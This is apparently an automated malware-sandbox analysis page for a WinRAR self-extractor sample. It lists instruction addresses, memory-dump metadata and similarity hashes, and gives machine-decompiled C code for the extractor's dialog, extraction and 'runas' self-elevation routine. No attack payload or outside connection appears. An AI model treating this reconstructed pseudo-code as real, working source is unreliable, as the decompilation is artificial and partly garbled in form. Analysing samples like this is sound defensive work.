0x00268d15
0x00268d17
0x00000000
0x00000000
0x00268c60
0x00268c60
0x00000000
0x00268c60
0x00268cba
0x00268cc2
0x00000000
0x00000000
0x00268cc4
0x00268cca
0x00268cd6
0x00268cd7
0x00268cda
0x00268ce8
0x00268ce9
0x00268cf0
0x00268cdc
0x00268cdc
0x00268cdc
0x00268cf5
0x00268cf5
0x00268cf8
0x00268cfa
0x00268c5d
0x00268c5d
0x00000000
0x00268c5d
0x00268d00
0x00000000
0x00268d00
0x00268c31
0x00268c34
0x00000000
0x00000000
0x00268c36
0x00268c38
0x00268c7c
0x00268c7c
0x00268c7e
0x00000000
0x00000000
0x00268c8a
0x00268c91
0x00000000
0x00268c91
0x00268c3a
0x00268c3d
0x00000000
0x00000000
0x00268c3f
0x00268c42
0x00000000
0x00000000
0x00268c51
0x00268c56
0x00268c58
0x00268c5a
0x00000000
0x00268c5a
0x00268bfc
0x00268bfe
0x00000000
0x00000000
0x00268c02
0x00268c03
0x00268c07
0x00000000
0x00000000
0x00268c0b
0x00268c0c
0x00000000
0x00268c0c
0x00268b48
0x00268b4e
0x00000000
0x00000000
0x00268b54
0x00268b5a
0x00268b60
0x00268b62
0x00268be2
0x00268be2
0x00000000
0x00268be2
0x00268b64
0x00268b6e
0x00268b6e
0x00268b7e
0x00268b81
0x00268b83
0x00268bdd
0x00268bdd
0x00268be0
0x00268be0
0x00000000
0x00268be0
0x00268b85
0x00268b8b
0x00268b8d
0x00268b8f
0x00268bb4
0x00268bba
0x00268bc6
0x00268bd1
0x00268bda
0x00000000
0x00268bda
0x00268b91
0x00268b9b
0x00268b9d
0x00268ba2
0x00268ba8
0x00000000
0x00000000
0x00268baa
0x00000000
0x00000000
0x00268bac
0x00268bb2
0x00000000
0x00000000
0x00000000
0x00268bb2
0x00268b93
0x00268b99
0x00000000
0x00000000
0x00000000
0x00268b99
0x00268b87
0x00268b89
0x00000000
0x00000000
0x00000000
0x00268b89
0x00268b66
0x00268b6c
0x00000000
0x00000000
0x00000000
0x00268b6c
0x00268ab0
0x00268ab0
0x00268ab0
0x00268ab0
0x00000000
0x00268ab0
0x00268a67
0x00268a6a
0x00268a6b
0x00268a6e
0x00268a70
0x00268a7b
0x00268a7d
0x00268a8c
0x00268a9e
0x00268a9e
0x00268a7d
0x00000000
0x00268a6e
0x00268a4c
0x00268a53
0x00268a5a
0x00268aa5
0x00000000
0x00268aa5
0x00000000
0x00268a5a
0x00268a06
0x00268a09
0x00268a10
0x00268a17
0x00268a1c
0x00268a1e
0x00000000
0x00000000
0x00268a20
0x00268a22
0x00268a25
0x00268a25
0x00268a2b
0x00268a30
0x00000000
0x00268a30
0x002689d4
0x002689dd
0x002689de
0x002689e3
0x002689e6
0x002689e8
0x002689f0
0x002689f0
0x002689f2
0x00000000
0x00000000
0x00000000
0x002689f4
0x0026897d
0x00268981
0x00268987
0x0026898a
0x0026898e
0x00268996
0x00268997
0x0026899a
0x002689a2
0x002689a3
0x002689a6
0x002689a8
0x002689ae
0x002689b4
0x002689b6
0x002689bc
0x002689c3
0x002689c6
0x002689c6
0x002689b4
0x002689a6
0x0026899a
0x0026898e
0x00000000
0x00268981
0x002688e5
0x002688e8
0x00000000
0x00000000
0x002688ee
0x002688f1
0x002688f4
0x002688f6
0x00000000
0x00000000
0x002688fc
0x002688ff
0x00000000
0x00000000
0x00268905
0x00268908
0x0026890f
0x00000000
0x00000000
0x00268917
0x00268921
0x00268926
0x00268928
0x0026895f
0x0026895f
0x00268963
0x002689ed
0x00000000
0x002689ed
0x00268969
0x0026896b
0x0026896d
0x00000000
0x0026896d
0x0026892a
0x0026892e
0x00000000
0x00000000
0x00268930
0x00268938
0x00268939
0x00268940
0x0026895a
0x00000000
0x0026895a
0x00268820
0x00268827
0x00000000
0x00000000
0x0026882f
0x0026883a
0x0026883f
0x00268842
0x00268844
0x00000000
0x00000000
0x00268846
0x0026884d
0x00000000
0x00000000
0x0026884f
0x00268856
0x00268860
0x00268861
0x00268898
0x0026889a
0x002688a6
0x002688ab
0x002688ad
0x00000000
0x002688ad
0x00268863
0x00268865
0x00268873
0x00268878
0x0026887c
0x00268882
0x00268882
0x00268793
0x00268778
0x0026877f
0x00268784
0x0026878b
0x00000000
0x0026878b
0x0026871d
0x00268723
0x00268728
0x0026872a
0x00000000
0x00000000
0x0026872c
0x00268733
0x00268745
0x00268747
0x00000000
0x00268747
0x00268736
0x0026873c
0x00268741
0x00268743
0x00000000
0x00000000
0x00000000
0x00268743
0x002686ec
0x002686ef
0x00000000
0x00000000
0x00000000
0x002686ef
0x002686de
0x002686e5
0x00000000
0x00000000
0x00000000
0x002686e5
0x002686ae
0x002686b5
0x00000000
0x00000000
0x002686b7
0x002686bb
0x002686c1
0x00000000
0x00000000
0x00000000
0x002686c1
0x0026865f
0x00268662
0x00268664
0x00000000
0x00000000
0x00000000
0x00268664
0x00268636
0x0026863c
0x0026863f
0x00268642
0x00268644
0x00000000
0x0026864a
0x0026864a
0x0026864a
0x00000000
0x0026864a
0x00268644
0x00268508
0x0026850e
0x00000000
0x00000000
0x00268510
0x00268517
0x00000000
0x00000000
0x00000000
0x00268517
0x002684e1
0x002684eb
0x002684eb
0x002684f1
0x00000000
0x002684f1
0x002684e3
0x002684e9
0x00000000
0x00000000
0x00000000
0x002684e9
0x002684c3
0x002684cd
0x002684cd
0x002684d3
0x00000000
0x002684d3
0x002684c5
0x002684cb
0x00000000
0x00000000
0x00000000
0x002684cb
0x0026842c
0x0026842f
0x0026844e
0x0026844e
0x00268451
0x00000000
0x00000000
0x00268457
0x0026845e
0x00000000
0x00000000
0x00268469
0x0026846a
0x0026846e
0x0026846f
0x00268470
0x00268475
0x00268477
0x0026848c
0x0026849d
0x00000000
0x00268479
0x00268480
0x00000000
0x00268480
0x00268477
0x00268431
0x00268438
0x00000000
0x0026843e
0x00268449
0x00000000
0x00268449
0x00268438
0x002683f5
0x00268413
0x00268413
0x00000000
0x00268413
0x002683f7
0x002683f8
0x002683fc
0x002683fd
0x00268405
0x0026841a
0x0026841a
0x00000000
0x00268407
0x0026840e
0x00000000
0x0026840e

APIs

__EH_prolog.LIBCMT ref: 002683C5
_memcmp.LIBVCRUNTIME ref: 0026883A

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: 0850ed92a6c866f84ded3380dae2d0af9b2e07962a3c30bcfb5bbf939d1d45b5
Instruction ID: 319661d6e3115815b739b1be680984f3bfcd7ca3662b191d36e76601c40b8a2d
Opcode Fuzzy Hash: 0850ed92a6c866f84ded3380dae2d0af9b2e07962a3c30bcfb5bbf939d1d45b5
Instruction Fuzzy Hash: A1820B71924186AEDF15CF64C885BFAB7B8BF15304F0842BAEC499B142DF315AE4CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0027E643, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0027E643() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0027E64F); // executed
				return _t1;
			}

0x0027e648
0x0027e64e

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0027E648

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 63b5dfba5b94e80321a6d78f35cb39702251938a2458ceb548a9eed5eb87ad24
Instruction ID: bd50b31a2f06ced140ef09849cca5ad76062d0dcae7ec238e512afccb7e86c85
Opcode Fuzzy Hash: 63b5dfba5b94e80321a6d78f35cb39702251938a2458ceb548a9eed5eb87ad24
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0027626D, Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f4c1641a84af0080bddf7c97dd2235b32a53fb783bfe3f6e2b9241fe6fec0d57
Instruction ID: 828f4319cdd41c2da48071f5440b7e1e299b67a8d1164cd8a11d575bed775f04
Opcode Fuzzy Hash: f4c1641a84af0080bddf7c97dd2235b32a53fb783bfe3f6e2b9241fe6fec0d57
Instruction Fuzzy Hash: 6AD13A71A147428FDB14DF28C88975BBBE4BF95308F04856DE84C9B642D334E968CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0027A5D1, Relevance: 100.5, APIs: 47, Strings: 10, Instructions: 724
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0027A5D1(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				struct HWND__* _t152;
				void* _t163;
				void* _t166;
				int _t169;
				void* _t182;
				struct HWND__* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				void* _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t254;
				WCHAR* _t255;
				int _t259;
				int _t261;
				void* _t266;
				void* _t270;
				signed short _t275;
				int _t277;
				struct HWND__* _t279;
				WCHAR* _t286;
				WCHAR* _t288;
				intOrPtr _t290;
				void* _t299;
				void* _t300;
				struct HWND__* _t302;
				signed int _t305;
				void* _t306;
				struct HWND__* _t308;
				void* _t310;
				long _t312;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;

				_t299 = __edx;
				_t285 = __ecx;
				E0027D870(E002914F6, _t321);
				E0027D940();
				_t275 =  *(_t321 + 0x10);
				_t305 =  *(_t321 + 0xc);
				_t302 =  *(_t321 + 8);
				if(E002612D7(_t299, _t302, _t305, _t275,  *(_t321 + 0x14), L"STARTDLG", 0, 0) == 0) {
					_t306 = _t305 - 0x110;
					__eflags = _t306;
					if(__eflags == 0) {
						E0027C343(_t299, __eflags, __fp0, _t302);
						_t105 =  *0x2ab704;
						_t277 = 1;
						 *0x2a75d8 = _t302;
						 *0x2a75c8 = _t302;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t302, 0x80, 1, _t105); // executed
						}
						_t106 =  *0x2b5d04;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t302, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t302, 0x68);
						 *(_t321 + 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E002795F8(_t321 - 0x1164, 0x800);
						_t111 = GetDlgItem(_t302, 0x66);
						__eflags =  *0x2a9602;
						_t308 = _t111;
						 *(_t321 + 0x10) = _t308;
						_t286 = 0x2a9602;
						if( *0x2a9602 == 0) {
							_t286 = _t321 - 0x1164;
						}
						SetWindowTextW(_t308, _t286);
						E00279A32(_t308); // executed
						_push(0x2a75e4);
						_push(0x2a75e0);
						_push(0x2bce18);
						_push(_t302);
						 *0x2a75d6 = 0; // executed
						_t114 = E00279EEF(_t286, _t299, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0x2a75d1 = _t277;
						}
						__eflags =  *0x2a75e4;
						if( *0x2a75e4 > 0) {
							_push(7);
							_push( *0x2a75e0);
							_push(_t302);
							E0027B4C7(_t299);
						}
						__eflags =  *0x2bde20;
						if( *0x2bde20 == 0) {
							SetDlgItemTextW(_t302, 0x6b, E0026DA42(_t286, 0xbf));
							SetDlgItemTextW(_t302, _t277, E0026DA42(_t286, 0xbe));
						}
						__eflags =  *0x2a75e4;
						if( *0x2a75e4 <= 0) {
							L103:
							__eflags =  *0x2a75d6;
							if( *0x2a75d6 != 0) {
								L114:
								__eflags =  *0x2a95fc - 2;
								if( *0x2a95fc == 2) {
									EnableWindow(_t308, 0);
								}
								__eflags =  *0x2a85f8;
								if( *0x2a85f8 != 0) {
									E00261294(_t302, 0x67, 0);
									E00261294(_t302, 0x66, 0);
								}
								_t115 =  *0x2a95fc;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0x2a75d7;
									if( *0x2a75d7 == 0) {
										_push(0);
										_push(_t277);
										_push(0x111);
										_push(_t302);
										__eflags = _t115 - _t277;
										if(_t115 != _t277) {
											 *0x29df38();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0x2a75d1;
								if( *0x2a75d1 != 0) {
									SetDlgItemTextW(_t302, _t277, E0026DA42(_t286, 0x90));
								}
								goto L125;
							}
							__eflags =  *0x2bce0c;
							if( *0x2bce0c != 0) {
								goto L114;
							}
							__eflags =  *0x2a95fc;
							if( *0x2a95fc != 0) {
								goto L114;
							}
							__eflags = 0;
							_t310 = 0xaa;
							 *((short*)(_t321 - 0x9688)) = 0;
							do {
								__eflags = _t310 - 0xaa;
								if(_t310 != 0xaa) {
									L109:
									__eflags = _t310 - 0xab;
									if(__eflags != 0) {
										L111:
										E0026FA89(__eflags, _t321 - 0x9688, " ", 0x2000);
										E0026FA89(__eflags, _t321 - 0x9688, E0026DA42(_t286, _t310), 0x2000);
										goto L112;
									}
									__eflags =  *0x2bde20;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0x2bde20;
								if( *0x2bde20 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t310 = _t310 + 1;
								__eflags = _t310 - 0xb0;
							} while (__eflags <= 0);
							_t286 =  *0x2a75e8; // 0x0
							E00278FE6(_t286, __eflags,  *0x2a0064,  *(_t321 + 0x14), _t321 - 0x9688, 0, 0);
							_t308 =  *(_t321 + 0x10);
							goto L114;
						} else {
							_push(0);
							_push( *0x2a75e0);
							_push(_t302); // executed
							E0027B4C7(_t299); // executed
							_t133 =  *0x2bce0c;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0x2a95fc;
								if(__eflags == 0) {
									_t288 =  *0x2a75e8; // 0x0
									E00278FE6(_t288, __eflags,  *0x2a0064,  *(_t321 + 0x14), _t133, 0, 0);
									L00282B4E( *0x2bce0c);
									_pop(_t286);
								}
							}
							__eflags =  *0x2a95fc - _t277;
							if( *0x2a95fc == _t277) {
								L102:
								_push(_t277);
								_push( *0x2a75e0);
								_push(_t302);
								E0027B4C7(_t299);
								goto L103;
							} else {
								 *0x29df3c(_t302);
								__eflags =  *0x2a95fc - _t277;
								if( *0x2a95fc == _t277) {
									goto L102;
								}
								__eflags =  *0x2a9601;
								if( *0x2a9601 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0x2a75e0);
								_push(_t302);
								E0027B4C7(_t299);
								__eflags =  *0x2bde18;
								if( *0x2bde18 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0x2a0064, L"LICENSEDLG", 0, E0027A3E1, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0x2a75d7 = _t277;
									L26:
									_push(_t277);
									L13:
									EndDialog(_t302, ??); // executed
									L125:
									_t116 = _t277;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t321 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t306 != 1;
					if(_t306 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t275 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0x2a75d0;
						if( *0x2a75d0 != 0) {
							L23:
							_t312 = 0x800;
							GetDlgItemTextW(_t302, 0x66, _t321 - 0x2164, 0x800);
							__eflags =  *0x2a75d0;
							if( *0x2a75d0 == 0) {
								__eflags =  *0x2a75d1;
								if( *0x2a75d1 == 0) {
									_t152 = GetDlgItem(_t302, 0x68);
									__eflags =  *0x2a75cc;
									_t279 = _t152;
									if( *0x2a75cc == 0) {
										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
										SendMessageW(_t279, 0xc2, 0, 0x2922e4);
										_t312 = 0x800;
									}
									SetFocus(_t279);
									__eflags =  *0x2a85f8;
									if( *0x2a85f8 == 0) {
										E0026FAB1(_t321 - 0x1164, _t321 - 0x2164, _t312);
										E0027C10F(_t285, _t321 - 0x1164, _t312);
										E00263E41(_t321 - 0x4288, 0x880, E0026DA42(_t285, 0xb9), _t321 - 0x1164);
										_t323 = _t323 + 0x10;
										_t163 = _t321 - 0x4288;
									} else {
										_t163 = E0026DA42(_t285, 0xba);
									}
									E0027C190(0, _t163);
									__eflags =  *0x2a9601;
									if( *0x2a9601 == 0) {
										E0027C7FC(_t321 - 0x2164);
									}
									_push(0);
									_push(_t321 - 0x2164);
									 *(_t321 + 0x17) = 0;
									_t166 = E00269D3A(0, _t321);
									_t277 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t300 = E00279A8D(_t321 - 0x2164);
										 *((char*)(_t321 + 0x13)) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											L43:
											_t169 =  *(_t321 + 0x17);
											L44:
											_t285 =  *0x2a9601;
											__eflags = _t285;
											if(_t285 != 0) {
												L50:
												__eflags =  *((char*)(_t321 + 0x13));
												if( *((char*)(_t321 + 0x13)) != 0) {
													 *0x2a75dc = _t277;
													E002612B2(_t302, 0x67, 0);
													E002612B2(_t302, 0x66, 0);
													SetDlgItemTextW(_t302, _t277, E0026DA42(_t285, 0xe6)); // executed
													E002612B2(_t302, 0x69, _t277);
													SetDlgItemTextW(_t302, 0x65, 0x2922e4); // executed
													_t315 = GetDlgItem(_t302, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0x2a75e0);
													_push(_t302);
													E0027B4C7(_t300);
													_push(2);
													_push( *0x2a75e0);
													_push(_t302);
													E0027B4C7(_t300);
													_push(0x2bce18);
													_push(_t302);
													 *0x2bfe3c = _t277; // executed
													E0027C6FF(_t285, __eflags); // executed
													_push(6);
													_push( *0x2a75e0);
													 *0x2bfe3c = 0;
													_push(_t302);
													E0027B4C7(_t300);
													__eflags =  *0x2a75d7;
													if( *0x2a75d7 == 0) {
														__eflags =  *0x2a75cc;
														if( *0x2a75cc == 0) {
															__eflags =  *0x2bde2c;
															if( *0x2bde2c == 0) {
																_push(4);
																_push( *0x2a75e0);
																_push(_t302);
																E0027B4C7(_t300);
															}
														}
													}
													E00261294(_t302, _t277, _t277);
													 *0x2a75dc =  *0x2a75dc & 0x00000000;
													__eflags =  *0x2a75dc;
													_t182 =  *0x2a75d7; // 0x1
													goto L75;
												}
												__eflags = _t285;
												_t169 = (_t169 & 0xffffff00 | _t285 != 0x00000000) - 0x00000001 &  *(_t321 + 0x17);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t321 + 0x17) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t321 + 0x17);
													if( *(_t321 + 0x17) != 0) {
														_push(E0026DA42(_t285, 0x9a));
														E00263E41(_t321 - 0x5688, 0xa00, L"\"%s\"\n%s", _t321 - 0x2164);
														E00266E03(0x2a00e0, _t277);
														E00279735(_t302, _t321 - 0x5688, E0026DA42(0x2a00e0, 0x96), 0x30);
														 *0x2a75cc =  *0x2a75cc + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t321 - 0x1164, 0x800);
												_t285 = 0x2ab602;
												E0026E7AA(0x2ab602, _t321 - 0x164, 0x80);
												_push(0x2aa602);
												E00263E41(_t321 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t321 - 0x2164);
												_t323 = _t323 + 0x14;
												 *(_t321 - 0x48) = 0x3c;
												 *((intOrPtr*)(_t321 - 0x44)) = 0x40;
												 *((intOrPtr*)(_t321 - 0x38)) = _t321 - 0x1164;
												 *((intOrPtr*)(_t321 - 0x34)) = _t321 - 0x11ca0;
												 *(_t321 - 0x40) = _t302;
												 *((intOrPtr*)(_t321 - 0x3c)) = L"runas";
												 *(_t321 - 0x2c) = _t277;
												 *((intOrPtr*)(_t321 - 0x28)) = 0;
												 *((intOrPtr*)(_t321 - 0x30)) = 0x2a75f8;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t321 + 8) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t321 + 0x10) =  *(_t321 + 0x14);
												} else {
													 *0x2b5d08 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E0026FAB1(0x2b5d0a, _t231, 0x2000);
													}
													E0027A24E(_t285, 0x2b9d0a, 7);
													E0027A24E(_t285, 0x2bad0a, 2);
													E0027A24E(_t285, 0x2bbd0a, 0x10);
													 *0x2bce0b = _t277;
													_t285 = 0x2bcd0a;
													E0026E90C(_t277, 0x2bcd0a, _t321 - 0x164);
													 *(_t321 + 0x10) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E0027EA80(_t238, 0x2b5d08, 0x7104);
													_t323 = _t323 + 0xc;
												}
												_t220 = ShellExecuteExW(_t321 - 0x48);
												E0026E957(_t321 - 0x164, 0x80);
												E0026E957(_t321 - 0x11ca0, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t321 + 0x10);
													 *(_t321 + 0x17) = _t277;
													goto L64;
												} else {
													 *0x29df20( *(_t321 - 0x10), 0x2710);
													_t71 = _t321 + 0xc;
													 *_t71 =  *(_t321 + 0xc) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t321 + 0x10);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t321 + 0xc) + 1;
														 *(_t321 + 0xc) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0x2bde2c =  *(_t321 - 0x10);
													L64:
													__eflags =  *(_t321 + 8);
													if( *(_t321 + 8) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t321 + 8));
													}
													goto L66;
												}
											}
											__eflags = _t300;
											if(_t300 == 0) {
												goto L52;
											}
											E00263E41(_t321 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t323 = _t323 + 0x10;
											E0026943C(_t321 - 0x3188);
											 *(_t321 - 4) =  *(_t321 - 4) & 0x00000000;
											_push(0x11);
											_push(_t321 - 0x1164);
											_t246 = E00269528(_t321 - 0x3188);
											 *((char*)(_t321 + 0x13)) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t321 + 0x17) = _t277;
												}
											}
											_t39 = _t321 - 4;
											 *_t39 =  *(_t321 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E0026946E(_t321 - 0x3188); // executed
											_t285 =  *0x2a9601;
											goto L50;
										}
										_t248 = GetLastError();
										_t300 =  *((intOrPtr*)(_t321 + 0x13));
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t277;
										 *(_t321 + 0x17) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t321 + 0x17) = _t277;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t277 = 1;
									_t182 = 1;
									 *0x2a75d7 = 1;
									L75:
									__eflags =  *0x2a75cc;
									if( *0x2a75cc <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0x2a75d0 = _t277;
									SetDlgItemTextW(_t302, _t277, E0026DA42(_t285, 0x90));
									_t290 =  *0x2a00e0; // 0x0
									__eflags = _t290 - 9;
									if(_t290 != 9) {
										__eflags = _t290 - 3;
										_t189 = ((0 | _t290 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t321 + 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E0026DA42(_t290, 0x96);
									E00279735(_t302, E0026DA42(_t290, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t277 = 1;
							__eflags =  *0x2a75d1;
							if( *0x2a75d1 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0x2bfe3c;
						if( *0x2bfe3c == 0) {
							goto L23;
						} else {
							__eflags =  *0x2bfe3d;
							_t254 = _t149 & 0xffffff00 |  *0x2bfe3d == 0x00000000;
							__eflags = _t254;
							 *0x2bfe3d = _t254;
							_t255 = E0026DA42((0 | _t254 != 0x00000000) + 0xe6, (0 | _t254 != 0x00000000) + 0xe6);
							_t277 = 1;
							SetDlgItemTextW(_t302, 1, _t255);
							while(1) {
								__eflags =  *0x2bfe3d;
								if( *0x2bfe3d == 0) {
									goto L125;
								}
								__eflags =  *0x2a75d7;
								if( *0x2a75d7 != 0) {
									goto L125;
								}
								_t259 = GetMessageW(_t321 - 0x64, 0, 0, 0);
								__eflags = _t259;
								if(_t259 == 0) {
									goto L125;
								} else {
									_t261 = IsDialogMessageW(_t302, _t321 - 0x64);
									__eflags = _t261;
									if(_t261 == 0) {
										TranslateMessage(_t321 - 0x64);
										DispatchMessageW(_t321 - 0x64);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t266 = _t149 - 1;
					__eflags = _t266;
					if(_t266 == 0) {
						_t277 = 1;
						__eflags =  *0x2a75dc;
						 *0x2a75d7 = 1;
						if( *0x2a75dc == 0) {
							goto L12;
						}
						__eflags =  *0x2a75cc;
						if( *0x2a75cc != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t266 == 0x65;
					if(_t266 == 0x65) {
						_t270 = E00261217(_t302, E0026DA42(_t285, 0x64), _t321 - 0x1164);
						__eflags = _t270;
						if(_t270 != 0) {
							SetDlgItemTextW(_t302, 0x66, _t321 - 0x1164);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}

0x0027a5d1
0x0027a5d1
0x0027a5d6
0x0027a5e0
0x0027a5e6
0x0027a5ea
0x0027a5ee
0x0027a607
0x0027a611
0x0027a611
0x0027a617
0x0027acb3
0x0027acb8
0x0027acbf
0x0027acc0
0x0027acc6
0x0027accc
0x0027acce
0x0027acd8
0x0027acd8
0x0027acde
0x0027ace3
0x0027ace5
0x0027acf2
0x0027acf2
0x0027ad01
0x0027ad10
0x0027ad13
0x0027ad25
0x0027ad2d
0x0027ad2f
0x0027ad37
0x0027ad39
0x0027ad3c
0x0027ad41
0x0027ad43
0x0027ad43
0x0027ad4b
0x0027ad52
0x0027ad57
0x0027ad5c
0x0027ad61
0x0027ad66
0x0027ad67
0x0027ad6e
0x0027ad73
0x0027ad75
0x0027ad77
0x0027ad77
0x0027ad7d
0x0027ad84
0x0027ad86
0x0027ad88
0x0027ad8e
0x0027ad8f
0x0027ad8f
0x0027ad94
0x0027ad9b
0x0027adab
0x0027adbe
0x0027adbe
0x0027adc4
0x0027adcb
0x0027ae7c
0x0027ae7c
0x0027ae83
0x0027af2c
0x0027af2c
0x0027af33
0x0027af38
0x0027af38
0x0027af3e
0x0027af45
0x0027af4c
0x0027af56
0x0027af56
0x0027af5b
0x0027af60
0x0027af62
0x0027af64
0x0027af6b
0x0027af6d
0x0027af6f
0x0027af70
0x0027af75
0x0027af76
0x0027af78
0x0027af82
0x0027af7a
0x0027af7a
0x0027af7a
0x0027af78
0x0027af6b
0x0027af88
0x0027af8f
0x0027af9e
0x0027af9e
0x00000000
0x0027af8f
0x0027ae89
0x0027ae90
0x00000000
0x00000000
0x0027ae96
0x0027ae9d
0x00000000
0x00000000
0x0027aea3
0x0027aea5
0x0027aeaa
0x0027aeb1
0x0027aeb1
0x0027aeb7
0x0027aec2
0x0027aec2
0x0027aec8
0x0027aed3
0x0027aee4
0x0027aefc
0x00000000
0x0027aefc
0x0027aeca
0x0027aed1
0x00000000
